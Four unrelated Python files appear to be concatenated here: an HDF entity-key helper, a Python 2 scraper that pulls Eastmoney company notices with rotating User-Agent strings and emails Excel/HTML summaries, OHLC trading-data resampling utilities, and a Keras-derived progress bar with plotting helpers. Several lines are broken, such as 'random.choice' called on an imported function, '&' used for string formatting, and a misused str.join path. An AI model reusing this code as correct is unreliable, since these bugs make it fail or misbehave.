The string representation of the entity key. Must be formatted
as ``"type.name.measure"`` or ``"type.measure"``.
"""
elements = [e for e in key.split('.') if e]
if len(elements) not in [2, 3] or len(key.split('.')) != len(elements):
raise ValueError(f'Invalid format for HDF key: {key}. '
'Acceptable formats are "type.name.measure" and "type.measure"')
super().__init__()
@property
def type(self) -> str:
"""The type of the entity represented by the key."""
return self.split('.')[0]
@property
def name(self) -> str:
"""The name of the entity represented by the key"""
return self.split('.')[1] if len(self.split('.')) == 3 else ''
@property
def measure(self) -> str:
"""The measure associated with the data represented by the key."""
return self.split('.')[-1]
@property
def group_prefix(self) -> str:
"""The HDF group prefix for the key."""
return '/'+self.type if self.name else '/'
@property
def group_name(self) -> str:
"""The HDF group name for the key."""
return self.name if self.name else self.type
@property
def group(self) -> str:
"""The full path to the group for this key."""
return self.group_prefix + '/' + self.group_name if self.name else self.group_prefix + self.group_name
@property
def path(self) -> str:
"""The full HDF path associated with this key."""
return self.group + '/' + self.measure
def with_measure(self, measure: str) -> 'EntityKey':
"""Replaces this key's measure with the provided one.
Parameters
----------
measure :
The measure to replace this key's measure with.
Returns
-------
EntityKey
A new EntityKey with the updated measure.
"""
if self.name:
return EntityKey(f'{self.type}.{self.name}.{measure}')
else:
return EntityKey(f'{self.type}.{measure}')
def __eq__(self, other: 'EntityKey') -> bool:
return isinstance(other, str) and str(self) == str(other)
def __ne__(self, other: 'EntityKey') -> bool:
return not self == other
def __hash__(self):
return hash(str(self))
def __repr__(self) -> str:
return f'EntityKey({str(self)})'
#####################
# Private utilities #
#####################
def _get_valid_hdf_path(path: Union[str, Path]) -> Path:
valid_suffixes = ['.hdf', '.h5']
path = Path(path)
if path.suffix not in valid_suffixes:
raise ValueError(f'{str(path)} has an invalid HDF suffix {path.suffix}.'
f' HDF files must have one of {valid_suffixes} as a path suffix.')
return path
def _write_pandas_data(path: Path, entity_key: EntityKey, data: Union[PandasObj]):
"""Write data in a pandas format to an HDF file.
This method currently supports :class:`pandas DataFrame` objects, with or
with or without columns, and :class:`pandas.Series` objects.
"""
if data.empty:
# Our data is indexed, sometimes with no other columns. This leaves an
# empty dataframe that store.put will silently fail to write in table
# format.
data = data.reset_index()
if data.empty:
raise ValueError("Cannot write an empty dataframe that does not have an index.")
metadata = {'is_empty': True}
data_columns = True
else:
metadata = {'is_empty': False}
data_columns = None
with pd.HDFStore(str(path), complevel=9) as store:
store.put(entity_key.path, data, format="table", data_columns=data_columns)
store.get_storer(entity_key.path).attrs.metadata = metadata # NOTE: must use attrs. write this up
def _write_json_blob(path: Path, entity_key: EntityKey, data: Any):
"""Writes a Python object as json to the HDF file at the given path."""
with tables.open_file(str(path), "a") as store:
if entity_key.group_prefix not in store:
store.create_group('/', entity_key.type)
if entity_key.group not in store:
store.create_group(entity_key.group_prefix, entity_key.group_name)
with filenode.new_node(store, where=entity_key.group, name=entity_key.measure) as fnode:
fnode.write(bytes(json.dumps(data), "utf-8"))
def _get_keys(root: tables.node.Node, prefix: str = '') -> List[str]:
"""Recursively formats the paths in an HDF file into a key format."""
keys = []
for child in root:
child_name = _get_node_name(child)
if isinstance(child, tables.earray.EArray): # This is the last node
keys.append(f'{prefix}.{child_name}')
elif isinstance(child, tables.table.Table): # Parent was the last node
keys.append(prefix)
else:
new_prefix = f'{prefix}.{child_name}' if prefix else child_name
keys.extend(_get_keys(child, new_prefix))
# Clean up some weird meta groups that get written with dataframes.
keys = [k for k in keys if '.meta.' not in k]
return keys
def _get_node_name(node: tables.node.Node) -> str:
"""Gets the name of a node from its string representation."""
node_string = str(node)
node_path = node_string.split()[0]
node_name = node_path.split('/')[-1]
return node_name
def _get_valid_filter_terms(filter_terms, colnames):
"""Removes any filter terms referencing non-existent columns
Parameters
----------
filter_terms
A list of terms formatted so as to be used in the `where` argument of
:func:`pd.read_hdf`.
colnames :
A list of column names present in the data that will be filtered.
Returns
-------
The list of valid filter terms (terms that do not reference any column
not existing in the data). Returns none if the list is empty because
the `where` argument doesn't like empty lists.
"""
if not filter_terms:
return None
valid_terms = filter_terms.copy()
for term in filter_terms:
# first strip out all the parentheses - the where in read_hdf
# requires all references to be valid
t = re.sub('[()]', '', term)
# then split each condition out
t = re.split('[&|]', t)
# get the unique columns referenced by this term
term_columns = set([re.split('[<=>\s]', i.strip())[0] for i in t])
if not term_columns.issubset(colnames):
valid_terms.remove(term)
return valid_terms if valid_terms else None
|
# *-* coding: utf-8 *-*
# 抓取东方财富上的上市公司公告
# http://data.eastmoney.com/notices/
# 代码版本 python 2.7 IDE:PyCharm
import requests
from random import random
import json
import xlrd
import xlwt
import time
import math
import urllib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.header import Header
import smtplib
import base64
import codecs
import ConfigParser
import logging
# 日志记录器
logger = logging.getLogger()
baseurl = "http://data.eastmoney.com"
apiurl = "http://data.eastmoney.com/notices/getdata.ashx?StockCode=&FirstNodeType=0&CodeType=%s&PageIndex=%s&PageSize=1000&jsObj=%s&SecNodeType=0&Time=&rt=%s"
noticeCate = 1
name = "eastmoneynotice"
path = "D:\\crawl\\eastmoney"
plateDic = [
{
"code": "hsa",
"name": "沪深A股",
"codeType": "1",
},
{
"code": "zxb",
"name": "中小板",
"codeType": "4",
},
{
"code": "cyb",
"name": "创业板",
"codeType": "5",
}
]
# 模拟请求头
user_agent_list = [
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1",
"Mozilla/5.0 (X11; CrOS i686 2268.111.0) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6",
"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/19.77.34.5 Safari/537.1",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.36 Safari/536.5",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.0 Safari/536.3",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24",
"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24"
]
def download_get_html(url, charset="utf-8", timeout=10, num_retries=3):
UA = random.choice(user_agent_list)
headers = {
'User-Agent': UA,
'Content-Type': 'text/html; charset=' + charset
}
try:
response = requests.get(url, headers=headers,
timeout=timeout)
# 设置编码
response.encoding = charset
# 404 容错
if response.status_code == 404:
logger.debug('get 404: %s ', url)
return None
else:
logger.debug('get : %s ', url)
return response.text
except:
if num_retries > 0:
time.sleep(10)
logger.debug('正在尝试,10S后将重新获取倒数第 %d 次', num_retries)
return download_get_html(url, charset, timeout, num_retries - 1)
else:
logger.debug('尝试也不好使了!取消访问')
return None
# 打开excel
def open_excel(file='file.xls'):
try:
data = xlrd.open_workbook(file)
return data
except Exception, e:
logger.debug(str(e))
# 分析excel 数据,获取分类数量
def analyze_excel(fileName):
file = open_excel(fileName)
workbook = xlwt.Workbook(encoding='utf-8')
wsb = workbook.add_sheet("汇总")
wsb.write(0, 0, label="板块")
wsb.write(0, 1, label="公告类型")
wsb.write(0, 2, label="数量")
alignment = xlwt.Alignment() # Create Alignment
# May be: HORZ_GENERAL, HORZ_LEFT, HORZ_CENTER, HORZ_RIGHT,
#HORZ_FILLED, HORZ_JUSTIFIED, HORZ_CENTER_ACROSS_SEL, HORZ_DISTRIBUTED
alignment.horz = xlwt.Alignment.HORZ_CENTER # 水平居中
# May be: VERT_TOP, VERT_CENTER, VERT_BOTTOM, VERT_JUSTIFIED,
# VERT_DISTRIBUTED
alignment.vert = xlwt.Alignment.VERT_CENTER # 垂直居中
style = xlwt.XFStyle() # Create Style
style.alignment = alignment # Add Alignment to Style
x = 1
for worksheet in file.sheets():
nrows = worksheet.nrows # 行数
ncols = worksheet.ncols # 列数
docs = {}
for rownum in range(1, nrows):
row = worksheet.row_values(rownum)
dataType = row[3]
if dataType in docs:
docs[dataType] = docs[dataType] + 1
else:
docs[dataType] = 1
for name in docs:
print worksheet.name, name, docs[name]
# TODO sheet.write_merge(0, 0, 0, 1, 'Long Cell')
# wsb.write(x, 0, label = worksheet.name)
wsb.write(x, 1, label=name)
wsb.write(x, 2, label=docs[name])
x = x + 1
print x, len(docs)
if len(docs) == 0:
wsb.write(x, 0, worksheet.name.encode("utf-8"), style)
else:
wsb.write_merge(x - len(docs), x - 1, 0, 0,
worksheet.name.encode("utf-8"), style)
print "-------"
workbook.save(u"汇总.xls")
# load_table_data.js getCode
def getCode(num=6):
s = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
codes = list(s)
code = ""
for x in xrange(0, num):
idx = int(math.floor(random() * 52))
code += codes[idx]
return code
# _url += parseInt(parseInt(new Date().getTime()) / 30000);
def getRightTime():
r = int(time.time() / 30)
return r
def getUrl(url, codetype, page, code, rt):
return url % (codetype, page, code, rt)
def parser_data(data):
temp = data["CDSY_SECUCODES"][0]
noteicedate = data["NOTICEDATE"]
date = noteicedate[0:noteicedate.index('T')]
code = temp["SECURITYCODE"]
name = temp["SECURITYSHORTNAME"]
title = data["NOTICETITLE"]
typeName = '公司公告'
if data["ANN_RELCOLUMNS"] and len(data["ANN_RELCOLUMNS"]) > 0:
typeName = data["ANN_RELCOLUMNS"][0]["COLUMNNAME"]
namestr = unicode(name).encode("utf-8")
detailLink = baseurl + '/notices/detail/' + code + '/' + \
data["INFOCODE"] + ',' + \
base64.b64encode(urllib.quote(namestr)) + '.html'
# print date,code,name,title,typeName,detailLink
if time_compare(date):
return [code, name, title, typeName, detailLink, date]
else:
return None
def time_compare(notice_date):
tt = time.mktime(time.strptime(notice_date, "%Y-%m-%d"))
# 得到公告的时间戳
if noticeCate == 1:
# A股公告取当日
# 得到本地时间(当日零时)的时间戳
st = time.strftime("%Y-%m-%d", time.localtime(time.time()))
else:
# 新三板公告取前日
# 得到本地时间(当日零时)的时间戳
st = time.strftime(
"%Y-%m-%d", time.localtime(time.time() - 60 * 60 * 24))
t = time.strptime(st, "%Y-%m-%d")
now_ticks = time.mktime(t)
# 周一需要是大于
if tt >= now_ticks:
return True
else:
return False
def do_notice(notices, plate):
for page in xrange(1, 10):
rt = getRightTime()
code = getCode(8)
url = getUrl(apiurl, plate["codeType"], page, code, rt)
jsdata = download_get_html(url)
if jsdata != None:
json_str = jsdata[15:-1]
datas = json.loads(json_str)["data"]
for data in datas:
# 公告日期
notice = parser_data(data)
if notice != None:
notices.append(notice)
else:
logger.debug("page end notices %s %d"& (plate["name"], len(notices)))
return
else:
logger.debug("no notices %s %d"& (plate["name"], len(notices)))
return
# 写excel
def write_sheet(workbook, sheetName, rows):
worksheet = workbook.add_sheet(sheetName)
worksheet.write(0, 0, label="代码")
worksheet.write(0, 1, label="名称")
worksheet.write(0, 2, label="公告标题")
worksheet.write(0, 3, label="公告类型")
for x in xrange(0, len(rows)):
row = rows[x]
for y in xrange(0, 4):
if y == 2:
alink = 'HYPERLINK("%s";"%s")' % (row[4], row[2])
worksheet.write(x + 1, y, xlwt.Formula(alink))
else:
item = row[y]
worksheet.write(x + 1, y, item)
def render_mail(name, rows):
html_mail = ""
header_tpl = """
<h2>%s</h2>
<table>
<thead>
<tr>
<th style="width: 60px; padding: 0px;text-align:center">代码</th>
<th style="width: 110px; padding: 0px;text-align:center">名称</th>
<th style="width: 385px; padding: 0px;text-align:center">公告标题</th>
<th style="width: 110px; padding: 0px;text-align:center">公告类型</th>
<th style="width: 80px; padding: 0px;text-align:center">公告日期</th>
</tr>
</thead>
<tbody>
"""
html_mail = html_mail + header_tpl % (name)
tr_tpl = """
<tr>
<td style="text-align:center">
%s
</td>
<td style="text-align:center">
%s
</td>
<td>
<a style="text-align:left;width:350px" href="%s" title="%s">%s</a>
</td>
<td style="text-align:center">
%s
</td>
<td style="text-align:center">
%s
</td>
</tr>
"""
for row in rows:
trs = tr_tpl % (unicode(row[0]).encode("utf-8"), unicode(row[1]).encode("utf-8"), unicode(row[4]).encode("utf-8"), unicode(
row[2]).encode("utf-8"), unicode(row[2]).encode("utf-8"), unicode(row[3]).encode("utf-8"), unicode(row[5]).encode("utf-8"))
html_mail = html_mail + trs
footer = "</tbody></table>"
html_mail = html_mail + footer
return html_mail
def write_html(now, html):
f = codecs.open(name + "-" + now + '.html', 'a', 'utf-8')
f.write(unicode(html, "utf-8"))
f.close()
def read_html(now):
ipath = name + "-" + now + '.html'
f = open(ipath)
html = ""
for text in f.readlines():
html = html + text.decode('utf-8')
f.close()
return html
def send_notice_mail(fileName, now):
cf = get_config_parser()
to_list = cf.get("mailconf", "to_list").split(",")
mail_host = cf.get("mailconf", "mail_host")
mail_username = cf.get("mailconf", "mail_username")
mail_user = cf.get("mailconf", "mail_user")
mail_pass = cf.get("mailconf", "mail_pass")
mail_postfix = cf.get("mailconf", "mail_postfix")
me = "AStockMarketNoticeWatcher" + "<" + \
mail_username + "@" + mail_postfix + ">"
msg = MIMEMultipart()
subject = now + ' 日 - 二级市场公告信息每日更新'
msg['Subject'] = Header(subject, 'utf-8')
msg['From'] = me
msg['To'] = ";".join(to_list)
mail_msg = read_html(now)
# 邮件正文内容
# msg.attach(MIMEText(now+" 日,二级市场公告信息。详情请见附件excel", 'plain', 'utf-8'))
msg.attach(MIMEText(mail_msg, 'html', 'utf-8'))
# 构造附件2,传送当前目录下的 xls 文件
att2 = MIMEText(open(fileName, 'rb').read(), 'base64', 'utf-8')
att2["Content-Type"] = 'application/octet-stream'
# 解决中文附件下载时文件名乱码问题
att2.add_header('Content-Disposition', 'attachment', filename='=?utf-8?b?' +
base64.b64encode(fileName.encode('UTF-8')) + '?=')
msg.attach(att2)
try:
server = smtplib.SMTP()
server.connect(mail_host)
server.ehlo()
server.starttls()
server.login(mail_user, mail_pass)
server.sendmail(me, to_list, msg.as_string())
server.close()
logger.debug('sent mail successfully')
except smtplib.SMTPException, e:
# 参考http://www.cnblogs.com/klchang/p/4635040.html
logger.debug('Error: 无法发送邮件', repr(e))
def get_config_parser():
config_file_path = "notice_montage.ini"
cf = ConfigParser.ConfigParser()
cf.read(config_file_path)
return cf
# 解析配置
def init_config():
cf = get_config_parser()
global DEBUG, INTERVAL, WEBSITE
INTERVAL = int(cf.get("timeconf", "interval"))
DEBUG = cf.get("urlconf", "debug") == 'True'
WEBSITE = cf.get("urlconf", "website")
def init_log():
if DEBUG:
# 测试日志输出到流
handler = logging.StreamHandler()
else:
# 正式日志输出到文件,备查
handler = logging.FileHandler("notice_montage.log")
formatter = logging.Formatter(
'%(asctime)s %(name)-12s %(levelname)-8s %(message)s')
handler.setFormatter(formatter)
logger.addHandler(handler)
logger.setLevel(logging.DEBUG)
def main(fileName, now):
workbook = xlwt.Workbook(encoding='utf-8')
for plate in plateDic:
if plate["code"] == "sb":
global noticeCate
noticeCate = 2
else:
global noticeCate
noticeCate = 1
notices = []
do_notice(notices, plate)
if len(notices) > 0:
write_sheet(workbook, plate["name"], notices)
html = render_mail(plate["name"], notices)
write_html(now, html)
workbook.save(fileName)
# send_notice_mail(fileName, now)
def run(fileName, now, num_retries=3):
try:
main(fileName, now)
except Exception, e:
logger.debug(str(e))
if num_retries > 0:
time.sleep(10)
logger.debug('公告抓取正在尝试,10S后将重新获取倒数第', num_retries, '次')
run(fileName, now, num_retries - 1)
else:
logger.debug('公告抓取尝试也不好使了!取消运行')
if __name__ == "__main__":
logger.debug("start")
num_retries = 3
now = time.strftime("%Y-%m-%d", time.localtime())
fileName = "gg-" + now + ".xls"
run(fileName, now)
# analyze_excel(fileName)
logger.debug("end")
|
import pytz
from datetime import datetime, timedelta
import numpy as np
import pandas as pd
import os
import settings
import time
import random
"""
Convert dates to default format and timezone
"""
def convert_datetime_with_timezone(date, time_zone = settings.DEFAULT_TIME_ZONE, format_date=settings.DEFAULT_FORMAT):
date = datetime.strptime(date, format_date)
timezone = pytz.timezone(time_zone).localize(date)
return timezone
"""
Convert dates to default format and timezone
"""
def convert_datetime(date, format_date=settings.DEFAULT_FORMAT):
date = datetime.strptime(date, format_date)
return date
def get_dataframe(symbol, start, end, type='T', frame=1, sep=';', format_date=settings.DEFAULT_FORMAT, backperiods=20, serie=None):
assert symbol in settings.SYMBOL_LIST, 'The symbol name is not registered in settings file.'
assert isinstance(symbol, str)
assert isinstance(start, str)
assert isinstance(end, str)
assert type in settings.FREQUENCY_LIST, "The frequence selected is unknown."
assert isinstance(frame, int)
assert isinstance(sep, str)
assert backperiods > 0, "El parametro backperiods no puede ser igual o menor que cero"
path = r"{}/{}/{}/{}.csv".format(settings.DATA_DIRECTORY, symbol, "{}{}".format(frame,settings.FREQUENCY_LIST[type]), 'last')
if type == 'T' or type == 'Min' or type == 'H':
path = r"{}/{}/{}/{}.csv".format(settings.DATA_DIRECTORY, symbol, "1Min", 'last')
elif type == 'M' or type == 'W' or type == 'D':
path = r"{}/{}/{}/{}.csv".format(settings.DATA_DIRECTORY, symbol, "1D", 'last')
elif type == 'tick':
pass
#data = pd.read_csv(path, sep=sep, usecols=['open', 'high', 'low', 'close'], parse_dates=['dateTime'])
data = pd.read_csv(path, sep=sep, usecols=['dateTime', 'open', 'high', 'low', 'close', 'volume'])
data['dateTime'] = pd.to_datetime(data['dateTime'], format=format_date)
if type == 'T' or type == 'Min':
if frame > 1:
data = resample_ohlc(data, type, frame)
elif type == 'H':
data = resample_ohlc(data, "Min", frame*60)
elif type == 'D':
if frame > 1:
data = resample_ohlc(data, type, frame)
elif type == 'M':
data = resample_ohlc(data, type, frame)
elif type == 'W':
data = resample_ohlc(data, "")
elif type == 'tick':
pass
data = data.dropna(axis=0)
start_date = convert_datetime(start)
#start_date = convert_datetime_with_timezone(start)
#print("Offset: {}".format(start_date))
start_date = get_base_bars(serie, start_date, type, frame, backperiods)
#print("Start Date DF: {}".format(start_date))
#print("Serie Before Filter")
#print(data)
mask = (data['dateTime'] >= start_date.strftime(settings.DEFAULT_FORMAT)) & (data['dateTime'] <= end)
#return data[start: end]
data = data.loc[mask]
data = data.reset_index()
#print(data)
return data
"""
The commisions are calculated by entry per side
"""
def get_commisions(symbol, contracts):
return settings.SYMBOL_LIST[symbol]['commisions'] * contracts
def convert_backperiods_to_time(type, frame, backperiods):
assert type in settings.FREQUENCY_LIST, "El tipo de temporalidad {}, no esta soportado".format(type)
assert isinstance(backperiods, int)
periods = backperiods*frame
if type == 'T' or type == 'Min':
return timedelta(minutes=periods)
elif type == 'H':
return timedelta(hours=periods)
elif type == 'D':
return timedelta(days=periods)
elif type == 'M':
return timedelta(days=periods * 30)
elif type == 'W':
return timedelta(weeks=periods)
"""
The serie format is:
['dateTime', 'min', 'max', 'avaliable']
avaliable params is in minutes
"""
def get_base_bars(serie, current_date, type, frame, backperiods):
# Se obtiene el requerimiento de tiempo bruto
time = 0
discount_factor = timedelta(days=2)
if type == 'T' or type == 'Min':
time = timedelta(minutes=frame * backperiods)
elif type == 'H':
time = timedelta(hours=frame * backperiods)
elif type == 'D':
time = timedelta(days=frame * backperiods)
discount_factor = timedelta(days=7)
elif type == 'M':
time = timedelta(days=frame * backperiods * 30)
discount_factor = timedelta(days=30)
elif type == 'W':
time = timedelta(weeks=frame * backperiods)
discount_factor = timedelta(weeks=1)
# Se obtiene una lista de la disponibilidad de tiempo por dias
current_date -= timedelta(days=1)
start_date = current_date - time
#print("Current Time: {} - Start Date: {}".format(current_date.date(), start_date.date()))
mask = (serie['dateTime'] >= start_date.date()) & (serie['dateTime'] <= current_date.date())
data = serie.loc[mask]
data = data.dropna(axis=0)
#print("Time Avaliable: {} - Time Need: {} - Start: {} - Current Date: {}".format(data['avaliable'].sum(), time.days * 24 * 60 + time.seconds / 60, start_date, current_date))
# Itera hasta completar la cantidad de datos necesarias
while data['avaliable'].sum() < (time.days * 24 * 60 + time.seconds / 60):
#print("While: {}".format(data['avaliable'].sum()))
start_date -= discount_factor
#print("New Start Date: {} - Current Date: {}".format(start_date.date(), current_date.date()))
mask = (serie['dateTime'] >= start_date.date()) & (serie['dateTime'] <= current_date.date())
data = serie.loc[mask]
data = serie.dropna(axis=0)
#return data.loc[mask].iloc[0, 0]
return data.iloc[0, 0]
def obtain_ohlc(path, name_price='ask', num_ticks = 34, position=''):
df = pd.read_csv(
path,
usecols = ['dateTime', name_price],
na_values = ['nan'],
parse_dates = True
)
df["dateTime"] = pd.to_datetime(df["dateTime"], unit='ms')
df = df.set_index('dateTime')
ohlc = df[name_price].resample('1Min').ohlc()
#ohlc = df.groupby(np.arange(len(df.index)) // num_ticks)
#ohlc['sret'] = ohlc['close'].pct_change()
ohlc['sret'] = np.log(ohlc['close']/ohlc['close'].shift())
ohlc['sret_high'] = np.log(ohlc['high']/ohlc['close'].shift())
ohlc['sret_low'] = np.log(ohlc['low']/ohlc['close'].shift())
# Elimina los valores no numericos del dataset
ohlc = ohlc.dropna()
if position == 'high' or position == 'low':
ohlc = ohlc[position]
return ohlc
'''
El formato del Dataframe debe ser el siguiente:
dateTime - open - high - low - close
No debe tener columna de indice de fecha
'''
def resample_ohlc(df, type='T', frame=60):
# Resample by Tick Frame
conversion = {'open': 'first', 'high': 'max', 'low': 'min', 'close': 'last', 'volume': 'sum'}
#df_ohlc = df.set_index('dateTime')
df = df.resample("{}{}".format(frame, type), label='right').agg(conversion)
#df = df.reset_index()
df = df.dropna(axis=0)
return df
def resample_ohlc_tick(df, tick_frame=34):
# Resample by Tick Frame
df['count'] = range(1, len(df) + 1)
df['group'] = np.floor(df['count'] / tick_frame)
ohlc = {'dateTime': df.groupby(['group'])['dateTime'].last(),
'open': df.groupby(['group'])['ask'].first(),
'high': df.groupby(['group'])['ask'].max(),
'low': df.groupby(['group'])['ask'].min(),
'close': df.groupby(['group'])['ask'].last(),
# 'count': df.groupby(['group'])['ask'].count()
}
df_ohlc = pd.DataFrame(ohlc, columns=['dateTime', 'open', 'high', 'low', 'close'])
df_ohlc = df_ohlc.set_index('dateTime')
return df_ohlc
def save_tmp(df, symbol, type, frame):
path = settings.DATA_DIRECTORY.join("/{}.h5".format(symbol))
# Create data store
data_store = pd.HDFStore(path)
data_store["{}-{}".format(type, frame)] = df
data_store.close()
def load_tmp(symbol, type, frame):
path = settings.DATA_DIRECTORY.join("/{}.h5".format(symbol))
# Access Data Store
data_store = pd.HDFStore(path)
if "{}-{}".format(type, frame) in data_store:
df = data_store["{}-{}".format(type, frame)]
data_store.close()
return df
def strTimeProp(start, end, format, prop, output_format):
start_time = time.mktime(time.strptime(start, format))
end_time = time.mktime(time.strptime(end, format))
new_date = start_time + prop * (end_time - start_time)
return time.strftime(output_format, time.localtime(new_date))
#return new_date
def random_date(start, end, format, output_format="%d/%m/%Y") -> datetime:
date = strTimeProp(start, end, format, random.random(), output_format)
holidays = settings.HOLIDAYS.keys()
date_obj = datetime.strptime(date, output_format)
while (date in holidays or date_obj.weekday() > 4):
date = strTimeProp(start, end, format, random.random(), output_format)
date_obj = datetime.strptime(date, output_format)
return date
|
<gh_stars>0
from __future__ import print_function, division, absolute_import
import sys
import math
import time
import numpy as np
import theano
from matplotlib import pyplot as plt
try:
import seaborn
except:
pass
# ===========================================================================
# Progress bar
# ===========================================================================
class Progbar(object):
'''
This function is adpated from: https://github.com/fchollet/keras
Original work Copyright (c) 2014-2015 keras contributors
Modified work Copyright 2016-2017 TrungNT
'''
def __init__(self, target, title=''):
'''
@param target: total number of steps expected
'''
self.width = 39
self.target = target
self.sum_values = {}
self.unique_values = []
self.start = time.time()
self.total_width = 0
self.seen_so_far = 0
self.title = title
def update(self, current, values=[]):
'''
@param current: index of current step
@param values: list of tuples (name, value_for_last_step).
The progress bar will display averages for these values.
'''
for k, v in values:
if k not in self.sum_values:
self.sum_values[k] = [v * (current - self.seen_so_far), current - self.seen_so_far]
self.unique_values.append(k)
else:
self.sum_values[k][0] += v * (current - self.seen_so_far)
self.sum_values[k][1] += (current - self.seen_so_far)
self.seen_so_far = current
now = time.time()
prev_total_width = self.total_width
sys.stdout.write("\b" * prev_total_width)
sys.stdout.write("\r")
numdigits = int(np.floor(np.log10(self.target))) + 1
barstr = '%s %%%dd/%%%dd [' % (self.title, numdigits, numdigits)
bar = barstr % (current, self.target)
prog = float(current) / self.target
prog_width = int(self.width * prog)
if prog_width > 0:
bar += ('=' * (prog_width - 1))
if current < self.target:
bar += '>'
else:
bar += '='
bar += ('.' * (self.width - prog_width))
bar += ']'
sys.stdout.write(bar)
self.total_width = len(bar)
if current:
time_per_unit = (now - self.start) / current
else:
time_per_unit = 0
eta = time_per_unit * (self.target - current)
info = ''
if current < self.target:
info += ' - ETA: %ds' % eta
else:
info += ' - %ds' % (now - self.start)
for k in self.unique_values:
info += ' - %s:' % k
if type(self.sum_values[k]) is list:
avg = self.sum_values[k][0] / max(1, self.sum_values[k][1])
if abs(avg) > 1e-3:
info += ' %.4f' % avg
else:
info += ' %.4e' % avg
else:
info += ' %s' % self.sum_values[k]
self.total_width += len(info)
if prev_total_width > self.total_width:
info += ((prev_total_width - self.total_width) * " ")
sys.stdout.write(info)
if current >= self.target:
sys.stdout.write("\n")
sys.stdout.flush()
def add(self, n, values=[]):
self.update(self.seen_so_far + n, values)
# ===========================================================================
# Plot genes
# ===========================================================================
def plot_genes(matrices):
colormap = 'Reds'
if matrices.ndim == 3:
matrices = [i for i in matrices]
elif not isinstance(matrices, (tuple, list)):
matrices = [matrices]
nrow = int(math.ceil(len(matrices) / 10))
# ====== test ====== #
for i, matrix in enumerate(matrices):
ax = plt.subplot(nrow, 10, i + 1)
if matrix.ndim != 2:
raise ValueError("Only accept matrix with 2-dimensions, "
"but the given input has %d-dimensions" % matrix.ndim)
# ax.set_aspect('equal', 'box')
img = ax.pcolorfast(matrix, cmap=colormap, alpha=0.9)
# plt.colorbar(img, ax=ax)
ax.set_xticks([])
ax.set_yticks([])
ax.axis('off')
plt.show(block=True)
# ===========================================================================
# Plot images
# ===========================================================================
def resize_images(x, shape):
from scipy.misc import imresize
reszie_func = lambda x, shape: imresize(x, shape, interp='bilinear')
if x.ndim == 4:
def reszie_func(x, shape):
# x: 3D
# The color channel is the first dimension
tmp = []
for i in x:
tmp.append(imresize(i, shape).reshape((-1,) + shape))
return np.swapaxes(np.vstack(tmp).T, 0, 1)
imgs = []
for i in x:
imgs.append(reszie_func(i, shape))
return imgs
def tile_raster_images(X, tile_shape=None, tile_spacing=(2, 2), spacing_value=0.):
''' This function create tile of images
Parameters
----------
X : 3D-gray or 4D-color images
for color images, the color channel must be the second dimension
tile_shape : tuple
resized shape of images
tile_spacing : tuple
space betwen rows and columns of images
spacing_value : int, float
value used for spacing
'''
if X.ndim == 3:
img_shape = X.shape[1:]
elif X.ndim == 4:
img_shape = X.shape[2:]
else:
raise ValueError('Unsupport %d dimension images' % X.ndim)
if tile_shape is None:
tile_shape = img_shape
if tile_spacing is None:
tile_spacing = (2, 2)
if img_shape != tile_shape:
X = resize_images(X, tile_shape)
else:
X = [np.swapaxes(x.T, 0, 1) for x in X]
n = len(X)
n = int(np.ceil(np.sqrt(n)))
# create spacing
rows_spacing = np.zeros_like(X[0])[:tile_spacing[0], :] + spacing_value
nothing = np.vstack((np.zeros_like(X[0]), rows_spacing))
cols_spacing = np.zeros_like(nothing)[:, :tile_spacing[1]] + spacing_value
# ====== Append columns ====== #
rows = []
for i in range(n): # each rows
r = []
for j in range(n): # all columns
idx = i * n + j
if idx < len(X):
r.append(np.vstack((X[i * n + j], rows_spacing)))
else:
r.append(nothing)
if j != n - 1: # cols spacing
r.append(cols_spacing)
rows.append(np.hstack(r))
# ====== Append rows ====== #
img = np.vstack(rows)[:-tile_spacing[0]]
return img
def plot_images(X, tile_shape=None, tile_spacing=None, fig=None, title=None):
'''
x : 2D-gray or 3D-color images, or list of (2D, 3D images)
for color image the color channel is second dimension
'''
from matplotlib import pyplot as plt
if not isinstance(X, (tuple, list)):
X = [X]
if not isinstance(title, (tuple, list)):
title = [title]
n = int(np.ceil(np.sqrt(len(X))))
